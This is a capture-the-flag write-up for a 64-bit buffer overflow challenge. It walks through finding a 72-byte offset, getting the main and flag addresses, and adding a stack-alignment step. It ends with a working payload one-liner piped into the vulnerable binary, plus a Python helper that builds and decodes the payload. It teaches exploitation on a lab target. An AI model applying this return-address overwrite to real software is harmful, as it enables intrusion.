Let's try moving to 64-bit, but don't worry, we'll start easy. Overflow the buffer and change the return address to the flag function in this program. You can find it in /problems/newoverflow-1_3_e53f871ba121b62d35646880e2577f89 on the shell server. Source.


  1. Find the offset/padding

    1. You can use the method described in rop64 with cyclic and cyclic_find, or you can use the following:

    2. Open vuln in radare2 with r2 ./vuln

    3. Run aaaa

    4. Run pdf @ sym.vuln to get var int local_40h @ rbp-0x40

    5. The buffer starts at rbp-0x40, so 8 more bytes are needed to step over the saved frame pointer (rbp) before reaching the return address

    6. So the offset is 0x40+8 = 72 bytes

  2. Run readelf -s vuln to get the address of main and flag.

  3. We cannot jump straight to the flag function, because in 64-bit that leaves the stack misaligned (the x86-64 ABI expects rsp to be 16-byte aligned at each call, and returning directly into flag puts it off by 8). So instead we form our payload as padding + main_address + flag_address, rather than just padding + flag_address as we would in 32-bit.

  4. We can use p64 from pwntools to convert each address to an 8-byte little-endian string.

  5. Payload complete: python2 -c "print 'A'*72 + '\xcb\x07@\x00\x00\x00\x00\x00' + 'g\x07@\x00\x00\x00\x00\x00'" | ./vuln
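As an added example (not part of the original writeup), here is the payload from step 5 taken apart and rebuilt in plain Python 3 with struct instead of pwntools, so the offset and the two little-endian qwords can be read back out of the raw bytes; the only input is the byte string quoted above.

```python
import struct

# Step 5's Python 2 string literal, re-typed as a Python 3 bytes object
# (constructed sample input; '@' is 0x40 and 'g' is 0x67).
PAGE_PAYLOAD = (b"A" * 72
                + b"\xcb\x07@\x00\x00\x00\x00\x00"
                + b"g\x07@\x00\x00\x00\x00\x00")


def p64(value):
    """Same job as pwntools' p64: one unsigned 64-bit little-endian qword."""
    return struct.pack("<Q", value)


def build_payload(offset, *addrs):
    """padding + return-address chain, as in step 3 (offset = buffer + saved rbp)."""
    return b"A" * offset + b"".join(p64(a) for a in addrs)


def decode_payload(payload, pad_byte=b"A"):
    """Split a payload into (padding length, list of qword addresses).

    The leading run of pad_byte is counted as the offset, then each 8-byte
    group is unpacked as a little-endian qword.  Caveat: an address whose
    lowest byte happens to equal pad_byte would be miscounted as padding.
    Raises ValueError if the address area is not a whole number of qwords.
    """
    offset = len(payload) - len(payload.lstrip(pad_byte))
    rest = payload[offset:]
    if len(rest) % 8:
        raise ValueError("address area is %d bytes, not a multiple of 8" % len(rest))
    addrs = [struct.unpack("<Q", rest[i:i + 8])[0] for i in range(0, len(rest), 8)]
    return offset, addrs


if __name__ == "__main__":
    offset, addrs = decode_payload(PAGE_PAYLOAD)
    print("offset = %d (0x40 + 8)" % offset)
    for a in addrs:
        # In the writeup's ordering: first main, then flag.
        print("  0x%x" % a)
    # Round trip: rebuilding from the decoded parts gives the original bytes.
    assert build_payload(offset, *addrs) == PAGE_PAYLOAD
```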
